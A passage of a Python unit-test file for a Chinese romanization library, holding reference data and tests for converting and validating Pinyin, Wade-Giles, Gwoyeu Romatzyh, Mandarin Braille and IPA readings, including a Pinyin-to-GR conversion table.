([u"TIAN1", u"AN1", u"MEN2"], False),
]),
({'toneMarkType': 'numbers', 'erhua': 'oneSyllable'}, [
([u"tiān", "'", u"ān", u"mén"], True),
([u"tiān", u"ān", u"mén"], True),
([u"chan", u"gan"], True),
(["xian"], True),
([u"tian1", u"an1", u"men2"], False),
([u"tian", u"an", u"men"], False),
([u"tian", "'", u"an", u"men"], True),
([u"lao3", u"angr2"], False),
([u"lao3", u"ang2", u"r5"], False),
([u"TIĀN", u"ĀN", u"MÉN"], True),
([u"TIAN1", u"AN1", u"MEN2"], False),
]),
]
GUESS_DIALECT_REFERENCES = [
(u"tiān'ānmén", {'toneMarkType': 'diacritics',
'pinyinApostrophe': "'"}),
(u"tiān’ānmén", {'toneMarkType': 'diacritics',
'pinyinApostrophe': u"’"}),
(u"xīān", {'toneMarkType': 'diacritics'}),
(u"tian1'an1men2", {'toneMarkType': 'numbers',
'pinyinApostrophe': "'"}),
(u"nv3hai2", {'toneMarkType': 'numbers', 'yVowel': 'v'}),
(u"NV3HAI2", {'toneMarkType': 'numbers', 'yVowel': 'v'}),
(u"nuu3hai2", {'toneMarkType': 'numbers', 'yVowel': 'uu'}),
(u"nǚhái", {'toneMarkType': 'diacritics', 'yVowel': u'ü'}),
(u"NǙHÁI", {'toneMarkType': 'diacritics', 'yVowel': u'ü'}),
(u"xi1'an1", {'toneMarkType': 'numbers', 'pinyinApostrophe': "'"}),
(u"lao3tou2r5", {'toneMarkType': 'numbers',
'erhua': 'twoSyllables'}),
(u"lao3tour2", {'toneMarkType': 'numbers', 'erhua': 'oneSyllable'}),
(u"peínǐ", {'toneMarkType': 'diacritics'}), # wrong placement of tone
(u"TIĀNĀNMÉN", {'toneMarkType': 'diacritics'}),
(u"e5'r5", {'toneMarkType': 'numbers', 'pinyinApostrophe': "'",
'erhua': 'twoSyllables'}),
(u"yi xia r ", {'toneMarkType': 'numbers', 'erhua': 'twoSyllables'}),
(u"ẑīdao", {'toneMarkType': 'diacritics', 'shortenedLetters': True}),
(u"mian4taŋ1", {'toneMarkType': 'numbers', 'shortenedLetters': True}),
(u"ŜÀŊHǍI", {'toneMarkType': 'diacritics', 'shortenedLetters': True,
'pinyinDiacritics': (u'\u0304', u'\u0301', u'\u030c', u'\u0300')}),
(u"SHÀNGHǍI", {'toneMarkType': 'diacritics',
'shortenedLetters': False}),
(u"Wŏ huì shuō yìdiănr", {'toneMarkType': 'diacritics',
'pinyinDiacritics': (u'\u0304', u'\u0301', u'\u0306', u'\u0300')}),
(u"Xiàndài Hànyû Dàcídiân", {'toneMarkType': 'diacritics',
'pinyinDiacritics': (u'\u0304', u'\u0301', u'\u0302', u'\u0300')}),
(u"ê Hàn", {'pinyinDiacritics': (u'\u0304', u'\u0301', u'\u030c',
u'\u0300')}),
]
def testStrictDecompositionReferences(self):
"""Test if the given decomposition references pass strictness test."""
for dialect, references in self.STRICT_DECOMPOSITION_REFERENCES:
for reference, target in references:
result = self.f.isStrictDecomposition(reference,
self.READING_NAME, **dialect)
self.assertEquals(result, target,
"Target %s of %s not reached: %s" \
% (repr(target), repr(reference), repr(result)) \
+ ' (reading %s, dialect %s)' \
% (self.READING_NAME, dialect))
class WadeGilesOperatorConsistencyTest(ReadingOperatorConsistencyTest,
unittest.TestCase):
READING_NAME = 'WadeGiles'
DIALECTS = crossDict(
[{}, {'diacriticE': 'e'}],
[{}, {'zeroFinal': 'u'}],
[{}, {'umlautU': 'u'}],
[{}, {'useInitialSz': True}],
[{}, {'neutralToneMark': 'zero'}, {'neutralToneMark': 'five'}],
[{}, {'wadeGilesApostrophe': u"'"}],
[{}, {'toneMarkType': 'numbers'}, {'toneMarkType': 'none'}],
[{}, {'missingToneMark': 'ignore'}],
[{}, {'strictSegmentation': True}],
[{}, {'case': 'lower'}],
)
def cleanDecomposition(self, decomposition, reading, **options):
if not hasattr(self, '_operators'):
self._operators = []
for operatorReading, operatorOptions, op in self._operators:
if reading == operatorReading and options == operatorOptions:
break
else:
op = self.f.createReadingOperator(reading, **options)
self._operators.append((reading, options, op))
return op.removeHyphens(decomposition)
class WadeGilesOperatorReferenceTest(ReadingOperatorReferenceTest,
unittest.TestCase):
READING_NAME = 'WadeGiles'
DECOMPOSITION_REFERENCES = [
({}, [
(u"K’ung³-tzŭ³", [u"K’ung³", u"-", u"tzŭ³"]),
(u"Ssŭma Ch’ien", [u"Ssŭ", "ma", " ", u"Ch’ien"]),
]),
({'wadeGilesApostrophe': "'", 'zeroFinal': 'u'}, [
(u"Ssuma Ch'ien", [u"Ssu", u"ma", " ", u"Ch'ien"]),
]),
({'wadeGilesApostrophe': "'"}, [
(u"Ssuma Ch'ien", [u"Ssuma", " ", u"Ch'ien"]),
(u"Ssŭma Ch'ien", [u"Ssŭ", u"ma", " ", u"Ch'ien"]),
]),
({'wadeGilesApostrophe': "'", 'zeroFinal': 'u'}, [
(u"Ssuma Ch'ien", [u"Ssu", "ma", " ", u"Ch'ien"]),
(u"Ssŭma Ch'ien", [u"Ssŭma", " ", u"Ch'ien"]),
]),
({'toneMarkType': 'numbers', 'umlautU': 'u'}, [
(u"Shih3-Chi4", [u"Shih3", "-", u"Chi4"]),
("chueh1", ["chueh1"])
]),
({'wadeGilesApostrophe': "'", 'strictSegmentation': True}, [
(u"Ssuma Ch'ien", exception.DecompositionError),
(u"Ssŭma Ch'ien", [u"Ssŭ", "ma", " ", u"Ch'ien"]),
]),
]
COMPOSITION_REFERENCES = [
({}, [
([u"K’ung³", u"-", u"tzŭ³"], u"K’ung³-tzŭ³"),
([u"K’ung³", u"tzŭ³"], u"K’ung³-tzŭ³"),
]),
({'wadeGilesApostrophe': "'", 'zeroFinal': 'u'}, [
([u"Ssu", "ma", " ", u"Ch'ien"], u"Ssu-ma Ch'ien"),
]),
({'wadeGilesApostrophe': "'"}, [
([u"Ssu", "ma", " ", u"Ch'ien"], exception.CompositionError),
([u"Ssŭ", "ma", " ", u"Ch'ien"], u"Ssŭ-ma Ch'ien"),
]),
({'toneMarkType': 'numbers'}, [
([u"Shih3", "-", u"Chi4"], u"Shih3-Chi4"),
([u"Shih3", u"Chi4"], u"Shih3-Chi4"),
(['t', u'’', 'ung1'], exception.CompositionError),
]),
({'toneMarkType': 'numbers', 'neutralToneMark': 'zero',
'missingToneMark': 'ignore'}, [
([u"Shih3", "-", u"Chi"], u"Shih3-Chi"),
([u"Shih3", u"Chi"], u"Shih3Chi"),
([u"Shih", u"Chi4"], exception.CompositionError),
]),
]
READING_ENTITY_REFERENCES = [
({}, [
(u"shih", True),
(u"jou⁴", True),
(u"nü³", True),
(u"Ssŭ", True),
(u"ch’êng", True),
(u"Ch’ien", True),
(u"ch'ien", False),
(u"ssu", False),
(u"szu", False),
(u"ch’eng", False),
(u"shih⁰", False),
(u"shih⁵", False),
(u"shih1", False),
]),
({'diacriticE': 'e'}, [
(u"shih", True),
(u"jou⁴", True),
(u"nü³", True),
(u"Ssŭ", True),
(u"ch’êng", False),
(u"Ch’ien", True),
(u"ch'ien", False),
(u"ssu", False),
(u"szu", False),
(u"ch’eng", True),
(u"shih⁰", False),
(u"shih⁵", False),
(u"shih1", False),
]),
({'zeroFinal': 'u'}, [
(u"shih", True),
(u"jou⁴", True),
(u"nü³", True),
(u"Ssŭ", False),
(u"ch’êng", True),
(u"Ch’ien", True),
(u"ch'ien", False),
(u"ssu", True),
(u"szu", False),
(u"ch’eng", False),
(u"shih⁰", False),
(u"shih⁵", False),
(u"shih1", False),
]),
({'neutralToneMark': 'zero'}, [
(u"shih", True),
(u"jou⁴", True),
(u"nü³", True),
(u"Ssŭ", True),
(u"ch’êng", True),
(u"Ch’ien", True),
(u"ch'ien", False),
(u"ssu", False),
(u"szu", False),
(u"ch’eng", False),
(u"shih⁰", True),
(u"shih⁵", False),
(u"shih1", False),
]),
({'neutralToneMark': 'five'}, [
(u"shih", True),
(u"jou⁴", True),
(u"nü³", True),
(u"Ssŭ", True),
(u"ch’êng", True),
(u"Ch’ien", True),
(u"ch'ien", False),
(u"ssu", False),
(u"szu", False),
(u"ch’eng", False),
(u"shih⁰", False),
(u"shih⁵", True),
(u"shih1", False),
]),
({'useInitialSz': True}, [
(u"shih", True),
(u"jou⁴", True),
(u"nü³", True),
(u"Ssŭ", False),
(u"ch’êng", True),
(u"Ch’ien", True),
(u"ch'ien", False),
(u"ssu", False),
(u"szu", False),
(u"szŭ", True),
(u"ch’eng", False),
(u"shih⁰", False),
(u"shih⁵", False),
(u"shih1", False),
]),
({'umlautU': 'u'}, [
(u"shih", True),
(u"jou⁴", True),
(u"nü³", False),
(u"Ssŭ", True),
(u"ch’êng", True),
(u"Ch’ien", True),
(u"ch'ien", False),
(u"ssu", False),
(u"szu", False),
(u"ch’eng", False),
(u"shih⁰", False),
(u"shih⁵", False),
(u"shih1", False),
]),
({'toneMarkType': 'numbers'}, [
(u"shih", True),
(u"jou⁴", False),
(u"nü³", False),
(u"Ssŭ", True),
(u"ch’êng", True),
(u"Ch’ien", True),
(u"ch'ien", False),
(u"ssu", False),
(u"szu", False),
(u"ch’eng", False),
(u"shih⁰", False),
(u"shih⁵", False),
(u"shih1", True),
]),
({'wadeGilesApostrophe': "'"}, [
(u"shih", True),
(u"jou⁴", True),
(u"nü³", True),
(u"Ssŭ", True),
(u"ch’êng", False),
(u"Ch’ien", False),
(u"ch'ien", True),
(u"ssu", False),
(u"szu", False),
(u"ch’eng", False),
(u"shih⁰", False),
(u"shih⁵", False),
(u"shih1", False),
]),
]
GUESS_DIALECT_REFERENCES = [
(u"K’ung³-tzǔ³", {'toneMarkType': 'superscriptNumbers',
'wadeGilesApostrophe': u'’', 'zeroFinal': u'ǔ'}),
(u"K’ung³-tzŭ³", {'toneMarkType': 'superscriptNumbers',
'wadeGilesApostrophe': u'’', 'zeroFinal': u'ŭ'}),
(u"Ssŭma Ch'ien", {'wadeGilesApostrophe': "'", 'zeroFinal': u'ŭ'}),
(u"Szuma Ch'ien", {'wadeGilesApostrophe': "'", 'zeroFinal': 'u',
'useInitialSz': True}),
(u"Szu1ma3 Ch'ien1", {'wadeGilesApostrophe': "'", 'zeroFinal': 'u',
'useInitialSz': True, 'toneMarkType': 'numbers'}),
(u"Shih3-Chi4", {'toneMarkType': 'numbers'}),
(u"chih¹-tao⁵", {'neutralToneMark': 'five'}),
(u"chih¹-tao", {'neutralToneMark': 'none'}),
(u"p’êng3yu0", {'neutralToneMark': 'zero', 'diacriticE': u'ê',
'wadeGilesApostrophe': u'’', 'toneMarkType': 'numbers'}),
(u"p’eng³yu", {'neutralToneMark': 'none', 'diacriticE': u'e',
'wadeGilesApostrophe': u'’', 'toneMarkType': 'superscriptNumbers'}),
(u"hsu¹", {'umlautU': 'u', 'toneMarkType': 'superscriptNumbers'}),
(u"nueh1", {'umlautU': 'u', 'toneMarkType': 'numbers'}),
(u"yu³", {'umlautU': u'ü', 'toneMarkType': 'superscriptNumbers'}),
(u"Cheng Ho", {'diacriticE': 'e', 'neutralToneMark': 'zero'}),
# either zero or five to enable tone "None" for all syllables
]
class GROperatorConsistencyTest(ReadingOperatorConsistencyTest,
unittest.TestCase):
READING_NAME = 'GR'
DIALECTS = crossDict(
[{}, {'strictSegmentation': True}],
[{}, {'abbreviations': False}],
[{}, {'grRhotacisedFinalApostrophe': "'"}],
[{}, {'grSyllableSeparatorApostrophe': "'"}],
[{}, {'optionalNeutralToneMarker': u'₀'}],
[{}, {'case': 'lower'}],
)
@staticmethod
def testUpperCase(dialect):
return dialect.get('case', None) != 'lower'
def cleanDecomposition(self, decomposition, reading, **options):
if not hasattr(self, '_operators'):
self._operators = []
for operatorReading, operatorOptions, op in self._operators:
if reading == operatorReading and options == operatorOptions:
break
else:
op = self.f.createReadingOperator(reading, **options)
self._operators.append((reading, options, op))
return op.removeApostrophes(decomposition)
def testValidAbbreviatedEntitiesAccepted(self):
"""
Test if all abbreviated reading entities returned by
``getAbbreviatedEntities()`` are accepted by ``isAbbreviatedEntity()``.
"""
forms = []
forms.extend(self.DIALECTS)
if {} not in forms:
forms.append({})
for dialect in forms:
grOperator = self.f.createReadingOperator(self.READING_NAME,
**dialect)
entities = grOperator.getAbbreviatedEntities()
for entity in entities:
self.assert_(
grOperator.isAbbreviatedEntity(entity),
"Abbreviated entity %s not accepted" % repr(entity) \
+ ' (reading %s, dialect %s)' \
% (self.READING_NAME, dialect))
def testAbbreviatedEntitiesConsistency(self):
"""
Test if all abbreviated reading entities returned by
``getAbbreviatedEntities()`` are accepted by ``isAbbreviatedEntity()``.
"""
forms = []
forms.extend(self.DIALECTS)
if {} not in forms:
forms.append({})
for dialect in forms:
grOperator = self.f.createReadingOperator(self.READING_NAME,
**dialect)
fullEntities = grOperator.getFullReadingEntities()
abbrevEntities = grOperator.getAbbreviatedEntities()
# test abbreviated entity is not a full form
for entity in abbrevEntities:
self.assert_(entity not in fullEntities,
"Abbreviated entity %s is a full form" % repr(entity) \
+ ' (reading %s, dialect %s)' \
% (self.READING_NAME, dialect))
# test forms have valid entities
for form in grOperator.getAbbreviatedForms():
for entity in form:
self.assert_(entity in abbrevEntities \
or entity in fullEntities,
"Form %s has invalid entity %s" \
% (repr(form), repr(entity)) \
+ ' (reading %s, dialect %s)' \
% (self.READING_NAME, dialect))
@attr('quiteslow')
def testRhotacisedEntitesBackConversion(self):
"""
Test if complement methods ``getBaseEntitiesForRhotacised()`` and
``getRhotacisedTonalEntity()`` are consistent.
"""
forms = []
forms.extend(self.DIALECTS)
if {} not in forms:
forms.append({})
for dialect in forms:
grOperator = self.f.createReadingOperator(self.READING_NAME,
**dialect)
plainEntities = grOperator.getPlainReadingEntities()
rhotacisedDict = {}
for plainEntity in plainEntities:
for tone in grOperator.getTones():
try:
rhotacisedForm = grOperator.getRhotacisedTonalEntity(
plainEntity, tone)
if rhotacisedForm not in rhotacisedDict:
rhotacisedDict[rhotacisedForm] = set()
rhotacisedDict[rhotacisedForm].add(
(plainEntity, tone))
except exception.UnsupportedError:
pass
# now check that back conversion gives us all the possible entities
for rhotacisedForm in rhotacisedDict:
entityPairs = grOperator.getBaseEntitiesForRhotacised(
rhotacisedForm)
self.assertEquals(entityPairs, rhotacisedDict[rhotacisedForm])
#TODO
class GROperatorReferenceTest(ReadingOperatorReferenceTest,
unittest.TestCase):
READING_NAME = 'GR'
DECOMPOSITION_REFERENCES = [
({}, [
(u"tian’anmen", ["tian", u"’", "an", "men"]),
(u"Beeijing", ["Beei", "jing"]),
(u"faan-guohlai", ["faan", "-", "guoh", "lai"]),
(u'"Haeshianq gen Muh.jianq"', ['"', "Hae", "shianq", " ", "gen",
" ", "Muh", ".jianq", '"']),
(u"keesh", ["kee", "sh"]),
(u"yeou ideal", ["yeou", " ", "i", "deal"]),
(u"TIAN’ANMEN", ["TIAN", u"’", "AN", "MEN"]),
(u"sherm.me", ["sherm", ".me"]),
(u"ig", ["i", "g"]),
]),
({'abbreviations': False}, [
(u"tian’anmen", ["tian", u"’", "an", "men"]),
(u"Beeijing", ["Beei", "jing"]),
(u"faan-guohlai", ["faan", "-", "guoh", "lai"]),
(u'"Haeshianq gen Muh.jianq"', ['"', "Hae", "shianq", " ", "gen",
" ", "Muh", ".jianq", '"']),
(u"keesh", ["keesh"]),
(u"yeou ideal", ["yeou", " ", "i", "deal"]),
(u"TIAN’ANMEN", ["TIAN", u"’", "AN", "MEN"]),
(u"sherm.me", ["sherm", ".me"]),
(u"ig", ["ig"]),
]),
]
COMPOSITION_REFERENCES = [
({}, [
(["tian", "an", "men"], u"tian’anmen"),
(["tian", u"’", "an", "men"], u"tian’anmen"),
(["Beei", "jing"], u"Beeijing"),
(["yeou", " ", "i", "deal"], u"yeou ideal"),
(["faan", "-", "guoh", "lai"], u"faan-guohlai"),
(["TIAN", "AN", "MEN"], u"TIAN’ANMEN"),
(["yeou", " ", "i", "dea'l"], exception.CompositionError),
(["jie", u"’", "l"], exception.CompositionError),
(["sherm", ".me"], u"sherm.me"),
(["san", "g"], u"san’g"),
(["i", "g"], u"ig"),
]),
({'abbreviations': False}, [
(["tian", "an", "men"], u"tian’anmen"),
(["tian", u"’", "an", "men"], u"tian’anmen"),
(["Beei", "jing"], u"Beeijing"),
(["yeou", " ", "i", "deal"], u"yeou ideal"),
(["faan", "-", "guoh", "lai"], u"faan-guohlai"),
(["TIAN", "AN", "MEN"], u"TIAN’ANMEN"),
(["yeou", " ", "i", "dea'l"], exception.CompositionError),
(["jie", u"’", "l"], exception.CompositionError),
(["sherm", ".me"], exception.CompositionError),
]),
]
READING_ENTITY_REFERENCES = [
({}, [
(u"shau", True),
(u"shao", True),
(u"shaw", True),
(u"dea’l", False),
(u"jie’l", True),
(u"jie'l", False),
(u"˳shyh", True),
(u"sh", True),
(u"j", True),
(u"jemm", True),
(u"JEMM", True),
(u"tzeem.me", False),
(u".v", True),
]),
({'abbreviations': False}, [
(u"shau", True),
(u"shao", True),
(u"shaw", True),
(u"dea’l", False),
(u"jie’l", True),
(u"jie'l", False),
(u"˳shyh", True),
(u"sh", False),
(u"j", False),
(u"jemm", False),
(u"JEMM", False),
(u"tzeem.me", False),
(u".v", False),
]),
]
GUESS_DIALECT_REFERENCES = []
ABBREVIATED_READING_ENTITY_REFERENCES = [
({}, [
(u"sh", True),
(u"SH", True),
(u"x", True),
]),
]
def testAbbreviatedEntitiesReferences(self):
"""
Test if abbreviated reading entity references are accepted by
``isAbbreviatedEntity()``.
"""
for dialect, references in self.ABBREVIATED_READING_ENTITY_REFERENCES:
grOperator = self.f.createReadingOperator(self.READING_NAME,
**dialect)
for reference, target in references:
result = grOperator.isAbbreviatedEntity(reference)
self.assertEquals(result, target,
"Target %s of %s not reached: %s" \
% (repr(target), repr(reference), repr(result)) \
+ ' (reading %s, dialect %s)' \
% (self.READING_NAME, dialect))
# The following mappings are taken from the Pinyin-to-GR Conversion Tables
# written/compiled by Richard Warmington from 12 December 1998,
# http://home.iprimus.com.au/richwarm/gr/pygrconv.txt
# Entry for 'ri' has been corrected for tones 1, 2, 'yo' removed as no
# source given and rhoticised finals have been added.
SPECIAL_MAPPING = """
zhi jy jyr jyy jyh
chi chy chyr chyy chyh
shi shy shyr shyy shyh
ri rhy ry ryy ryh
zi tzy tzyr tzyy tzyh
ci tsy tsyr tsyy tsyh
si sy syr syy syh
ju jiu jyu jeu jiuh
qu chiu chyu cheu chiuh
xu shiu shyu sheu shiuh
yi i yi yii yih
ya ia ya yea yah
ye ie ye yee yeh
yai iai yai - -
yao iau yau yeau yaw
you iou you yeou yow
yan ian yan yean yann
yin in yn yiin yinn
yang iang yang yeang yanq
ying ing yng yiing yinq
yong iong yong yeong yonq
wu u wu wuu wuh
wa ua wa woa wah
wo uo wo woo woh
wai uai wai woai way
wei uei wei woei wey
wan uan wan woan wann
wen uen wen woen wenn
wang uang wang woang wanq
weng ueng - woeng wenq
yu iu yu yeu yuh
yue iue yue yeue yueh
yuan iuan yuan yeuan yuann
yun iun yun yeun yunn
er el erl eel ell
yir iel yel yeel yell
yar ial yal yeal yall
yer ie'l ye'l yeel yell
yair - yal - -
yaor iaul yaul yeaul yawl
your ioul youl yeoul yowl
yanr ial yal yeal yall
yinr iel yel yeel yell
yangr iangl yangl yeangl yanql
yingr iengl yengl yeengl yenql
yongr iongl yongl yeongl yonql
wur ul wul wuul wull
war ual wal woal wall
wor uol wol wool woll
wair ual wal woal wall
weir uel wel woel well
wanr ual wal woal wall
wenr uel wel woel well
wangr uangl wangl woangl wanql
wengr uengl - woengl wenql
yur iuel yuel yeuel yuell
yuer iue'l yue'l - yuell
yuanr iual yual yeual yuall
yunr iuel yuel yeuel yuell
"""
# final mapping without line 'r'
FINAL_MAPPING = """
a a ar aa ah ha a
o o or oo oh ho o
e e er ee eh he e
ai ai air ae ay hai ai
ei ei eir eei ey hei ei
ao au aur ao aw hau au
ou ou our oou ow hou ou
an an arn aan ann han an
en en ern een enn hen en
ang ang arng aang anq hang ang
eng eng erng eeng enq heng eng
ong ong orng oong onq hong ong
i i yi ii ih hi i
ia ia ya ea iah hia ia
ie ie ye iee ieh hie ie
iai iai yai - - hiai iai
iao iau yau eau iaw hiau iau
iu iou you eou iow hiou iou
ian ian yan ean iann hian ian
in in yn iin inn hin in
iang iang yang eang ianq hiang iang
ing ing yng iing inq hing ing
iong iong yong eong ionq hiong iong
u u wu uu uh hu u
ua ua wa oa uah hua ua
uo uo wo uoo uoh huo uo
uai uai wai oai uay huai uai
ui uei wei oei uey huei uei
uan uan wan oan uann huan uan
un uen wen oen uenn huen uen
uang uang wang oang uanq huang uang
u: iu yu eu iuh hiu iu
u:e iue yue eue iueh hiue iue
u:an iuan yuan euan iuann hiuan iuan
u:n iun yun eun iunn hiun iun
ar al arl aal all hal al
or ol orl ool oll hol ol
er e'l er'l ee'l ehl he'l e'l
air al arl aal all hal al
eir el erl eel ell hel el
aor aul aurl aol awl haul aul
our oul ourl ooul owl houl oul
anr al arl aal all hal al
enr el erl eel ell hel el
angr angl arngl aangl anql hangl angl
engr engl erngl eengl enql hengl engl
ongr ongl orngl oongl onql hongl ongl
ir iel yel ieel iell hiel iel
iar ial yal eal iall hial ial
ier ie'l ye'l ieel iell hie'l ie'l
iair - yal - - - -
iaor iaul yaul eaul iawl hiaul iaul
iur ioul youl eoul iowl hioul ioul
ianr ial yal eal iall hial ial
inr iel yel ieel iell hiel iel
iangr iangl yangl eangl ianql hiangl iangl
ingr iengl yengl ieengl ienql hiengl iengl
iongr iongl yongl eongl ionql hiongl iongl
ur ul wul uul ull hul ul
uar ual wal oal uall hual ual
uor uol wol uool uoll huol uol
uair ual wal oal uall hual ual
uir uel wel oel uell huel uel
uanr ual wal oal uall hual ual
unr uel wel oel uell huel uel
uangr uangl wangl oangl uanql huangl uangl
uengr uengl - - - huengl uengl
u:r iuel yuel euel iuell hiuel iuel
u:er iue'l yue'l euel iuell hiue'l iue'l
u:anr iual yual eual iuall hiual iual
u:nr iuel yuel euel iuell hiuel iuel
"""
PINYIN_FINAL_MAPPING = {'iu': 'iou', 'ui': 'uei', 'un': 'uen', 'u:': u'ü',
'u:e': u'üe', 'u:an': u'üan', 'u:n': u'ün', 'iur': 'iour',
'uir': 'ueir', 'unr': 'uenr', 'u:r': u'ür', 'u:er': u'üer',
'u:anr': u'üanr', 'u:nr': u'ünr'}
INITIAL_REGEX = re.compile('^(tz|ts|ch|sh|[bpmfdtnlsjrgkh])?')
INITIAL_MAPPING = {'b': 'b', 'p': 'p', 'f': 'f', 'd': 'd', 't': 't',
'g': 'g', 'k': 'k', 'h': 'h', 'j': 'j', 'q': 'ch', 'x': 'sh', 'zh': 'j',
'ch': 'ch', 'sh': 'sh', 'z': 'tz', 'c': 'ts', 's': 's', 'm': 'm',
'n': 'n', 'l': 'l', 'r': 'r'}
"""Mapping of Pinyin intials to GR ones."""
def setUp(self):
super(GROperatorReferenceTest, self).setUp()
self.converter = self.f.createReadingConverter('Pinyin',
'GR', sourceOptions={'erhua': 'oneSyllable'},
targetOptions={'grRhotacisedFinalApostrophe': "'"})
self.pinyinOperator = self.f.createReadingOperator('Pinyin',
erhua='oneSyllable')
self.grOperator = self.f.createReadingOperator('GR',
grRhotacisedFinalApostrophe="'")
# read in plain text mappings
self.grJunctionSpecialMapping = {}
for line in self.SPECIAL_MAPPING.split("\n"):
if line.strip() == "":
continue
matchObj = re.match(r"((?:\w|:)+)\s+((?:\w|')+|-)\s+" \
+ "((?:\w|')+|-)\s+((?:\w|')+|-)\s+((?:\w|')+|-)", line)
assert(matchObj is not None)
pinyinSyllable, gr1, gr2, gr3, gr4 = matchObj.groups()
self.grJunctionSpecialMapping[pinyinSyllable] = {1: gr1, 2: gr2,
3: gr3, 4: gr4}
self.grJunctionFinalMapping = {}
self.grJunctionFinalMNLRMapping = {}
for line in self.FINAL_MAPPING.split("\n"):
matchObj = re.match(r"((?:\w|\:)+)\s+((?:\w|')+|-)\s+" \
+ "((?:\w|')+|-)\s+((?:\w|')+|-)\s+((?:\w|')+|-)" \
+ "\s+((?:\w|')+|-)\s+((?:\w|')+|-)", line)
if not matchObj:
continue
pinyinFinal, gr1, gr2, gr3, gr4, gr1_m, gr2_m = matchObj.groups()
if pinyinFinal in self.PINYIN_FINAL_MAPPING:
pinyinFinal = self.PINYIN_FINAL_MAPPING[pinyinFinal]
self.grJunctionFinalMapping[pinyinFinal] = {1: gr1, 2: gr2, 3: gr3,
4: gr4}
self.grJunctionFinalMNLRMapping[pinyinFinal] = {1: gr1_m, 2: gr2_m}
def testGRJunctionTable(self):
"""Test if all GR syllables have a reference given."""
grEntities = set(self.grOperator.getFullReadingEntities())
# no neutral tone syllables
for entity in grEntities.copy():
if entity[0] in ['.', self.grOperator.optionalNeutralToneMarker]:
grEntities.remove(entity)
# remove syllables with entry '-' in GR Junction table
grEntities = grEntities - set([u'yeai', u'yay', u'weng'])
pinyinEntities = self.pinyinOperator.getPlainReadingEntities()
for pinyinPlainSyllable in pinyinEntities:
pinyinInitial, pinyinFinal \
= self.pinyinOperator.getOnsetRhyme(pinyinPlainSyllable)
if pinyinPlainSyllable in ['zhi', 'chi', 'shi', 'zi', 'ci',
'si', 'ri', 'ju', 'qu', 'xu', 'er'] \
or (pinyinPlainSyllable[0] in ['y', 'w']) \
and pinyinPlainSyllable in self.grJunctionSpecialMapping:
for tone in [1, 2, 3, 4]:
target = self.grJunctionSpecialMapping[pinyinPlainSyllable]\
[tone]
if target == '-':
continue
pinyinSyllable = self.pinyinOperator.getTonalEntity(
pinyinPlainSyllable, tone)
syllable = self.converter.convert(pinyinSyllable)
self.assertEquals(syllable, target,
"Wrong conversion to GR %s for Pinyin syllable %s: %s" \
% (repr(target), repr(pinyinSyllable),
repr(syllable)))
# mark as seen
grEntities.discard(target)
elif pinyinInitial in ['m', 'n', 'l', 'r'] \
and pinyinFinal[0] != u'ʅ' \
and pinyinFinal in self.grJunctionFinalMNLRMapping \
and pinyinFinal in self.grJunctionFinalMapping:
for tone in [1, 2]:
target = self.grJunctionFinalMNLRMapping[pinyinFinal][tone]
if target == '-':
continue
pinyinSyllable = self.pinyinOperator.getTonalEntity(
pinyinPlainSyllable, tone)
syllable = self.converter.convert(pinyinSyllable)
tonalFinal = self.INITIAL_REGEX.sub('', syllable)
self.assertEquals(tonalFinal, target,
"Wrong conversion to GR %s for Pinyin syllable %s: %s" \
% (repr(target), repr(pinyinSyllable),
repr(syllable)))
# mark as seen
fullTarget = pinyinInitial + target
grEntities.discard(fullTarget)
for tone in [3, 4]:
target = self.grJunctionFinalMapping[pinyinFinal][tone]
if target == '-':
continue
pinyinSyllable = self.pinyinOperator.getTonalEntity(
pinyinPlainSyllable, tone)
syllable = self.converter.convert(pinyinSyllable)
tonalFinal = self.INITIAL_REGEX.sub('', syllable)
self.assertEquals(tonalFinal, target,
"Wrong conversion to GR %s for Pinyin syllable %s: %s" \
% (repr(target), repr(pinyinSyllable),
repr(syllable)))
# mark as seen
if pinyinInitial:
initialTarget = self.INITIAL_MAPPING[pinyinInitial]
else:
initialTarget = ''
grEntities.discard(initialTarget + target)
#elif pinyinInitial not in ['z', 'c', 's', 'zh', 'ch', 'sh', ''] \
#and pinyinFinal not in ['m', 'ng', 'mr', 'ngr', u'ʅ', u'ʅr']:
elif pinyinFinal not in ['m', 'n', 'ng', 'mr', 'nr', 'ngr', u'ʅ',
u'ʅr', u'ɿr', u'ê', u'êr'] \
and pinyinFinal in self.grJunctionFinalMapping:
for tone in [1, 2, 3, 4]:
target = self.grJunctionFinalMapping[pinyinFinal][tone]
if target == '-':
continue
pinyinSyllable = self.pinyinOperator.getTonalEntity(
pinyinPlainSyllable, tone)
syllable = self.converter.convert(pinyinSyllable)
tonalFinal = self.INITIAL_REGEX.sub('', syllable)
self.assertEquals(tonalFinal, target,
"Wrong conversion to GR %s for Pinyin syllable %s: %s" \
% (repr(target), repr(pinyinSyllable),
repr(syllable)))
# mark as seen
if pinyinInitial:
initialTarget = self.INITIAL_MAPPING[pinyinInitial]
else:
initialTarget = ''
grEntities.discard(initialTarget + target)
self.assert_(len(grEntities) == 0,
'Not all GR entities have test cases: %s' % repr(grEntities))
class MandarinBrailleOperatorConsistencyTest(ReadingOperatorConsistencyTest,
unittest.TestCase):
READING_NAME = 'MandarinBraille'
DIALECTS = crossDict(
[{}, {'toneMarkType': 'none'}, {'missingToneMark': 'fifth'}],
)
# TODO
#class MandarinBrailleReferenceTest(ReadingOperatorReferenceTest,
#unittest.TestCase):
#READING_NAME = 'MandarinBraille'
#DECOMPOSITION_REFERENCES = []
#COMPOSITION_REFERENCES = []
#READING_ENTITY_REFERENCES = []
class MandarinIPAOperatorConsistencyTest(ReadingOperatorConsistencyTest,
unittest.TestCase):
READING_NAME = 'MandarinIPA'
DIALECTS = crossDict(
[{}, {'toneMarkType': 'numbers'}, {'toneMarkType': 'chaoDigits'},
{'toneMarkType': 'numbers', 'missingToneMark': 'ignore'},
{'toneMarkType': 'chaoDigits', 'missingToneMark': 'ignore'},
#{'toneMarkType': 'diacritics'}, # TODO NotImplementedError
#{'toneMarkType': 'diacritics', 'missingToneMark': 'ignore'},
{'toneMarkType': 'none'}],
)
@staticmethod
def testUpperCase(dialect):
return False
def cleanDecomposition(self, decomposition, reading, **options):
return [entity for entity in decomposition if entity != '.']
# TODO
#class MandarinIPAReferenceTest(ReadingOperatorReferenceTest,
#unittest.TestCase):
#READING_NAME = 'MandarinIPA'
#DECOMPOSITION_REFERENCES = []
#COMPOSITION_REFERENCES = []
#READING_ENTITY_REFERENCES = []
class ShanghaineseIPAOperatorConsistencyTest(ReadingOperatorConsistencyTest,
unittest.TestCase):
READING_NAME = 'ShanghaineseIPA'
DIALECTS = crossDict(
[{}, #{'toneMarkType': 'numbers'},
